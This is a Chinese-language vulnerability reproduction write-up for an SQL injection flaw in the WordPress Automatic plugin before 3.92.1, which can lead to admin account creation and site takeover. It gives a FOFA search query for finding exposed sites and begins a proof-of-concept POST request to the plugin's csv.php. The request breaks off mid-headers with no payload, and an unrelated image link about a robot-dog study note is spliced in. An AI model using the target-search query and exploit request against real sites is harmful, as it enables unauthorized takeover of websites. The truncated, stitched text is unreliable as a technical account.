0x01 产品简介
WordPress Automatic(又称为WP Automatic)是一款流行的WordPress插件,旨在帮助网站管理员自动化内容创建和发布。该插件可以从各种来源(如RSS Feeds、社交媒体、视频网站、新闻网站等)获取内容,并将其自动发布到WordPress网站。
0x02 漏洞概述
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
0x03 影响范围
WordPress Automatic Plugin < 3.92.1
0x04 复现环境
FOFA:body="/wp-content/plugins/wp-automatic"
0x05 漏洞复现
PoC
POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;
![[学习笔记]CyberDog小米机器狗 开发学习](https://img-blog.csdnimg.cn/direct/3d57d3cae91941eeba4f7e02152521bc.png)
